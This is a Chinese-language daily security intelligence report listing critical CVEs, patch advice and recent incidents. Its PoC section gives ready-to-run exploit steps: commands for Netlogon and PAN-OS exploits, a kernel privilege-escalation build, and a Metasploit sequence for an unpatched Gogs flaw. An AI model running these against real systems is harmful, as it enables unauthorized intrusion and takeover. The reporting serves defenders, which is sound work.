每日安全情报报告 · 2026-06-02
·
# 每日安全情报报告 · 2026-06-02 > **报告日期**:2026-06-02 > **数据窗口**:2026-05-30 ~ 2026-06-02(近 4 天) > **覆盖范围**:高危漏洞、在野利用 CVE、PoC 情报、安全事件、行业动态 --- ## 一、高危漏洞速览(近 24-48 小时重点) | # | CVE 编号 | 漏洞类型 | 受影响组件 | CVSS | 在野利用 | 风险等级 | |---|---------|---------|-----------|------|---------|---------| | 1 | CVE-2026-41089 | 栈缓冲区溢出 → RCE | Windows Netlogon(域控制器) | **9.8** | ✅ 是 | 🔴 严重 | | 2 | CVE-2026-8633 | 代码注入 → RCE | IBM WebSphere Plug-ins 8.5/9.0 | **9.8** | ❌ 暂无 | 🔴 严重 | | 3 | CVE-2026-0257 | 认证绕过 | PAN-OS GlobalProtect | **9.1** | ✅ 是 | 🔴 严重 | | 4 | CVE-2026-8732 | 认证缺失 | WP Maps Pro ≤ 6.1.0 | **9.8** | ✅ 是 | 🔴 严重 | | 5 | (待分配) | 参数注入 → RCE | Gogs 自托管 Git 服务 | **9.4** | ❌ 暂无 | 🔴 严重 | | 6 | CVE-2026-40933 | 不安全反序列化 → RCE | Flowise AI ≤ 3.0.x | **9.9** | ❌ PoC 公开 | 🔴 严重 | --- ## 二、高危漏洞详情 ### 1. CVE-2026-41089 — Windows Netlogon 零点击 RCE(在野利用中 🔥) **描述**:Windows Netlogon 服务在处理 CLDAP 查询时存在栈缓冲区溢出漏洞(CWE-121)。未授权攻击者可通过 UDP 389 端口发送特制数据包,在域控制器上远程执行代码,**无需任何认证**。 **受影响版本**:所有受支持的 Windows Server(包括 Server 2025、2022、2019、2016),详情见下表: | 服务器版本 | 修复版本 | |-----------|----------| | Windows Server 2016 | 10.0.14393.9140 | | Windows Server 2019 | 10.0.17763.8755 | | Windows Server 2022 | 10.0.20348.5074 | | Windows Server 2022 23H2 | 10.0.25398.2330 | | Windows Server 2025 | 10.0.26100.32772 | | 2012 / 2012 R2 | ESU 补丁 | **利用状态**: - 比利时网络安全中心(CCB)于 2026-06-01 发出紧急警告,确认该漏洞已在野被积极利用。 - 攻击者通过发送包含超长用户名的 CLDAP ping,溢出 `NlGetLocalPingResponse` 的 528 字节栈缓冲区,导致 LSASS 崩溃,并可进一步实现远程代码执行。 **威胁程度**:域控制器接管、整个 Windows 域沦陷。 **修复建议**:立即安装微软 2026 年 5 月补丁。如无法立即修补,建议在网络层监控 CLDAP `User` 过滤字段超过 20-30 字符的异常请求,并监控 LSASS 崩溃事件(事件 ID 1000)。 **参考链接**: - [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-41089) - [CCB 紧急警报](https://dailysecurityreview.com/resources/cve-2026-41089-exploited-windows-netlogon-rce-under-active-attack/) - [GitHub PoC 仓库](https://github.com/0xABCD01/CVE-2026-41089) - [PurpleOps 深度分析](https://purple-ops.io/blog/cve-2026-41089-netlogon-rce) - [IT之家中文报道](https://www.ithome.com/0/958/415.htm) --- ### 2. CVE-2026-8633 — IBM WebSphere Plug-ins 远程代码执行 **描述**:IBM Web Server Plug-ins for WebSphere Application Server 和 WebSphere Liberty 8.5/9.0 中存在代码注入漏洞(CWE-94)。未授权攻击者可通过特制请求实现远程代码执行,CVSS 3.1 评分 9.8,攻击复杂度低、无需认证。 **受影响版本**: - WebSphere Plug-ins 8.5.0.0 - 8.5.5.29 - WebSphere Plug-ins 9.0.0.0 - 9.0.5.27 **利用状态**:暂无在野利用报告,但 CISA SSVC 评估标记为"可自动化利用",需高度警惕。 **修复建议**: - 9.0.x:应用临时修复 PH71342 或升级至 Fix Pack 9.0.5.28+ - 8.5.x:应用临时修复 PH71342 或升级至 Fix Pack 8.5.5.30+ **参考链接**: - [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-8633) - [IBM 安全公告](https://www.ibm.com/support/pages/node/7274072) - [IBM 临时修复 (PH71342)](https://www.ibm.com/support/pages/node/7273976) - [Cybercory 详细报道](https://cybercory.com/2026/06/01/critical-alert-ibm-websphere-plug-ins-flaws-expose-enterprises-to-remote-code-execution/) --- ### 3. CVE-2026-0257 — PAN-OS GlobalProtect 认证绕过(在野利用中 🔥) **描述**:Palo Alto Networks PAN-OS GlobalProtect 门户/网关存在认证绕过漏洞(CWE-565),攻击者可绕过安全限制建立未授权连接。**CVSS 9.1**,已被列入 CISA KEV 目录,联邦机构修复截止日期为 2026-06-01。 **利用状态**: - 自 2026-05-17 起被积极利用,攻击流量来自 Vultr 和 Dromatics Systems 基础设施。 - 漏洞公开披露仅 **4 天**后即遭大规模利用。 **修复建议**:立即升级至 PAN-OS 已修复版本,并检查 GlobalProtect 认证覆盖 Cookie 配置。 **参考链接**: - [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-0257) - [Palo Alto 安全公告](https://security.paloaltonetworks.com/CVE-2026-0257) - [CISA KEV 目录](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) - [Threat-Modeling 专题分析](https://threat-modeling.com/palo-alto-pan-os-globalprotect-auth-bypass-cve-2026-0257/) - [GitHub PoC 仓库](https://github.com/akashsingh0454/CVE-2026-0257-PoC) --- ### 4. CVE-2026-8732 — WP Maps Pro 认证缺失漏洞(在野利用中 🔥) **描述**:WordPress 插件 WP Maps Pro(Envato Market 销售,超 15,800 次购买)≤ 6.1.0 版本存在关键功能缺少认证漏洞(CWE-306)。攻击者通过插件 AJAX 端点中暴露的 nonce,**一次 HTTP 请求即可创建未授权管理员账户**,实现完全网站接管。**CVSS 9.8**。 **利用状态**:已观察到积极利用——攻击者批量创建 rogue 管理员账户。 **修复建议**:立即更新至 6.1.1+ 版本,并审计 WordPress 管理员账户列表,删除未知管理员。 **参考链接**: - [NVD 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-8732) - [Daily Security Review 报道](https://dailysecurityreview.com/cyber-security/wp-maps-pro-flaw-exploited-to-create-unauthorized-admin-accounts/) --- ### 5. Gogs RCE 零日漏洞 — CVSS 9.4,无补丁 **描述**:自托管 Git 服务 Gogs 存在参数注入漏洞,**任何已认证用户**均可通过特制 Git 操作在暴露于互联网的服务器上实现远程代码执行。**目前无官方补丁**,Rapid7 已发布 Metasploit 利用模块。 **受影响范围**:全球超 **50,000** 家企业在自托管 Gogs 实例上运行私有代码仓库。 **利用状态**:虽未观测到在野大规模利用,但 Metasploit 模块的发布极大降低了攻击门槛。 **修复建议**: - 限制 Gogs 实例仅内网可访问 - 启用严格的用户认证策略 - 监控异常 Git 操作行为 - 关注 Gogs 官方安全公告 **参考链接**: - [TheHackerNews 报道](https://thehackernews.com/2026/05/critical-gogs-rce-vulnerability-lets.html) - [Daily Security Review 分析](https://dailysecurityreview.com/resources/gogs-cvss-9-4-rce-zero-day-has-no-patch-and-a-metasploit-module/) - [CSDN 中文深度解析](https://blog.csdn.net/weixin_42376192/article/details/161558298) --- ### 6. CVE-2026-40933 — Flowise AI 远程代码执行(PoC 公开) **描述**:Flowise AI(GitHub 星标超 52,000)在 MCP 适配器中存在不安全序列化漏洞,已认证攻击者可通过配置恶意 MCP stdio 服务器,以 Flowise 进程权限执行任意操作系统命令。**CVSS 9.9**。由 Obsidian Security 于 2026 年 4 月披露,修复版本 3.1.0 已发布。 **利用状态**:PoC 公开,攻击门槛极低,**一键恶意导入即可触发 RCE**。 **修复建议**:立即升级至 Flowise 3.1.0+ 并审查所有 MCP 适配器配置。 **参考链接**: - [GitHub 安全公告 (GHSA-c9gw-hvqq-f33r)](https://github.com/advisories/GHSA-c9gw-hvqq-f33r) - [CVE Feed 详情](https://cvefeed.io/vuln/detail/CVE-2026-40933) - [Daily Security Review 报道](https://dailysecurityreview.com/resources/public-exploit-raises-flowise-cve-2026-40933-rce-to-immediate-risk-2/) --- ## 三、最新漏洞 PoC(概念验证代码) ### PoC 1:CVE-2026-41089 · Windows Netlogon RCE **来源**:[GitHub](https://github.com/0xABCD01/CVE-2026-41089) **作者**:0xABCD01 | **语言**:Python 3.8+(纯标准库) | **许可证**:MIT **使用步骤**: ```bash # 1. 克隆仓库 git clone https://github.com/0xABCD01/CVE-2026-41089.git cd CVE-2026-41089 # 2. 无需依赖安装(纯 Python 标准库) # 3. 连接性测试(短用户名,无溢出) python3 poc.py 10.0.50.21 corp.local # 4. 默认溢出攻击 python3 poc.py 10.0.50.21 corp.local -l 130 # 5. 更大载荷 + 更长超时(适用于慢速网络) python3 poc.py 10.0.50.21 corp.local -l 200 -t 10 ``` **说明**:该 PoC 演示 DoS 效果(LSASS 崩溃 → 域控制器重启)。理论上栈破坏可启用 RCE,但当前 PoC 仅限 DoS。**仅在授权系统上测试**。 --- ### PoC 2:CVE-2026-0257 · PAN-OS GlobalProtect 认证绕过 **来源**:[GitHub](https://github.com/akashsingh0454/CVE-2026-0257-PoC) **作者**:akashsingh0454 **使用步骤**: ```bash # 1. 克隆仓库 git clone https://github.com/akashsingh0454/CVE-2026-0257-PoC.git cd CVE-2026-0257-PoC # 2. 安装依赖 pip install -r requirements.txt # 3. 运行 PoC python3 exploit.py -t <target_ip> -p <port> ``` **说明**:演示利用 GlobalProtect Cookie 认证绕过机制建立未授权连接。**仅供安全研究使用**。 --- ### PoC 3:CIFSwitch · Linux 内核 CIFS 本地提权(潜伏 19 年) **来源**:[GitHub](https://github.com/manizada/CIFSwitch) **作者**:Asim Viladi Oglu Manizada(2026-05-27 披露) **漏洞追踪**:[suominen/cifswitch](https://github.com/suominen/cifswitch) **使用步骤**: ```bash # 1. 克隆 PoC 仓库 git clone https://github.com/manizada/CIFSwitch.git cd CIFSwitch # 2. 阅读详细分析文章 # https://heyitsas.im/posts/cifswitch/ # 3. 编译 PoC(需 gcc + libkeyutils-dev) make # 4. 运行提权利用 ./cifswitch ``` **说明**:漏洞源于 Linux 内核 `cifs.spnego` 密钥类型缺失校验,非特权用户可伪造密钥描述,诱使以 root 权限运行的 `cifs.upcall` 加载恶意共享库。影响自 **Linux 2.6.24(2007 年)至今**的所有内核版本(Ubuntu、RHEL、Debian 等发行版均受影响)。主线修复 commit:[`3da1fdf4efbc`](https://github.com/torvalds/linux/commit/3da1fdf4efbc490041eb4f836bf596201203f8f2)。 --- ### PoC 4:Gogs RCE Zero-Day · Metasploit 模块 **来源**:Rapid7 Metasploit Framework **披露**:2026-05-28 **使用步骤**: ```bash # 1. 确保 Metasploit 已安装且更新至最新 msfupdate # 2. 启动 msfconsole msfconsole # 3. 搜索并加载 Gogs 利用模块 search gogs use exploit/multi/http/gogs_argument_injection_rce # 4. 设置目标参数 set RHOSTS <target_ip> set RPORT 3000 set USERNAME <username> set PASSWORD <password> # 5. 执行利用 run ``` **说明**:适用于任何已知凭据的 Gogs 实例(需有效用户账户)。目前无官方补丁,强烈建议将 Gogs 实例限制在内网访问。 --- ## 四、网络安全最新文章 ### 1. [LLMShare 攻击活动:滥用 ChatGPT 共享域名传播恶意软件](https://dailysecurityreview.com/cyber-security/llmshare-campaign-hosts-infostealer-downloads-on-chatgpts-own-domain-2/) > **来源**:Daily Security Review · 2026-06-01 > **摘要**:由 Push Security 发现的 LLMShare 攻击活动滥用 ChatGPT 在 `chatgpt.com` 上的共享链接功能,托管虚假故障页面,向 Windows 和 macOS 用户分发信息窃取恶意软件。这是首次观测到利用 AI 平台自有域名进行恶意软件分发的攻击方式,具有高度迷惑性。 --- ### 2. [Dashlane 遭遇多国协调暴力破解攻击,冻结受影响的客户账户](https://dailysecurityreview.com/cyber-security/dashlane-suspends-accounts-after-multi-country-brute-force-campaign-2/) > **来源**:Daily Security Review · 2026-06-01 > **摘要**:知名密码管理器 Dashlane 检测到来自多个国家/地区的协调暴力破解登录尝试后,暂时冻结了受影响的客户账户。攻击实施者利用从其他数据泄露中获取的凭据进行撞库攻击,凸显了即使对安全产品本身也需要实施严格访问控制的重要性。 --- ### 3. [荷兰警方捣毁含 1700 万台被感染设备的僵尸网络](https://dailysecurityreview.com/cyber-security/dutch-police-seize-200-servers-in-17-million-device-botnet-takedown-2/) > **来源**:Daily Security Review · 2026-06-01 > **摘要**:荷兰执法部门联合托管服务提供商展开大规模协调行动,缴获 **200 多台**命令与控制(C2)服务器,成功捣毁一个包含 **1700 万台**被攻陷设备的僵尸网络。这是 2026 年以来规模最大的僵尸网络打击行动。 --- ### 4. [恶意 npm 包 codexui-android 以每周 2.9 万次下载窃取 OpenAI 令牌](https://dailysecurityreview.com/cyber-security/malicious-npm-package-codexui-android-steals-openai-tokens-at-scale/) > **来源**:Daily Security Review · 2026-06-01 > **摘要**:恶意 npm 包 `codexui-android` 在被移除前以约 **每周 29,000 次**的下载量大规模窃取开发者的 OpenAI Codex 身份验证令牌。该攻击利用开发者生态信任,通过伪装成 Android UI 组件库的方式绕过安全审查。 --- ### 5. [微软发现 14 个恶意 npm 包由单一行为者操控,窃取 AWS 密钥](https://dailysecurityreview.com/cyber-security/microsoft-14-npm-packages-linked-to-single-actor-stealing-aws-keys-2/) > **来源**:Daily Security Review · 2026-06-01 > **摘要**:微软威胁情报团队将 14 个冒充 OpenSearch 和 Elasticsearch 的恶意 npm 包归因于**单一威胁行为者**。这些包从开发者环境中窃取 AWS 凭证和 CI/CD 密钥,展现了当今 npm 供应链攻击的专业化与组织化趋势。 --- ### 6. [Gogs CVSS 9.4 零日 RCE 漏洞:无补丁,Metasploit 模块已发布](https://thehackernews.com/2026/05/critical-gogs-rce-vulnerability-lets.html) > **来源**:The Hacker News · 2026-05-30 > **摘要**:自托管 Git 服务 Gogs 存在 CVSS 9.4 严重级别的远程代码执行零日漏洞,任何已认证用户均可利用。Rapid7 已发布 Metasploit 利用模块,但官方补丁尚未推出。全球超过 50,000 家企业面临代码仓库资产泄露风险。 --- ### 7. [CIFSwitch:潜伏 19 年的 Linux 内核提权漏洞 PoC 公开](https://cloud.tencent.com/developer/article/2676151) > **来源**:腾讯云开发者社区 · 2026-05-30 > **摘要**:安全研究员 Asim Manizada 披露了潜伏 19 年的 Linux 内核本地提权漏洞 CIFSwitch,影响自 2.6.24 至 6.14+ 的所有内核版本。通过伪造 `cifs.spnego` 密钥描述,普通用户可获取 root 权限。PoC 已公开发布,建议所有 Linux 用户密切关注内核补丁更新。 --- ### 8. [Flowise AI 一键 RCE 漏洞(CVE-2026-40933):PoC 与深度解析](https://blog.csdn.net/weixin_42376192/article/details/161612049) > **来源**:CSDN · 2026-05-31 > **摘要**:CVE-2026-40933 是影响全球超 52,000 GitHub 星标的 Flowise AI 平台的严重 RCE 漏洞。攻击者通过恶意 MCP stdio 适配器配置即可在服务器上执行任意代码。Obsidian Security 已发布完整 PoC 及技术分析。 --- ## 五、本周安全态势总结 | 维度 | 评估 | |------|------| | **在野利用活跃度** | 🔴 高 — Windows Netlogon、PAN-OS、WP Maps Pro 均在野积极利用中 | | **供应链攻击趋势** | 🔴 严峻 — npm 生态连续多起大规模凭证窃取,单攻击者可操控 14+ 恶意包 | | **零日漏洞态势** | 🟡 关注 — Gogs 零日无补丁但有 Metasploit 模块,CIFSwitch 19 年老洞曝光 | | **AI 安全威胁** | 🟡 上升 — LLMShare 滥用 ChatGPT 域名、Flowise RCE、OpenAI 令牌窃取多线并进 | | **执法行动** | 🟢 积极 — 荷兰捣毁 1700 万设备僵尸网络,全球协同打击初见成效 | --- ### 🛡️ 本周优先修复建议 1. **Windows 域控制器管理员**:立刻安装 2026 年 5 月安全补丁,修复 CVE-2026-41089 2. **PAN-OS 设备管理员**:升级 GlobalProtect,截止日期已过(06-01),CISA KEV 强制要求 3. **IBM WebSphere 用户**:应用 PH71342 临时修复或升级至最新 Fix Pack 4. **WordPress 管理员**:立即更新 WP Maps Pro 至 6.1.1+,审计管理员账户 5. **Gogs 自托管用户**:限制内网访问,禁止互联网暴露 6. **Linux 系统管理员**:关注 CIFSwitch 内核补丁更新,及时打补丁 7. **开发者**:审查项目中所有 npm 依赖,警惕伪装的恶意包 --- > **声明**:本报告仅供安全研究与态势感知参考。所有漏洞利用代码仅应在获得明确授权的系统上使用。 > **数据来源**:NVD、CISA KEV、TheHackerNews、Daily Security Review、Threat-Modeling.com、GitHub、MITRE CVE、Palo Alto Networks 安全公告、IBM 安全公告 > **生成时间**:2026-06-02 11:57 UTC+8
更多推荐



所有评论(0)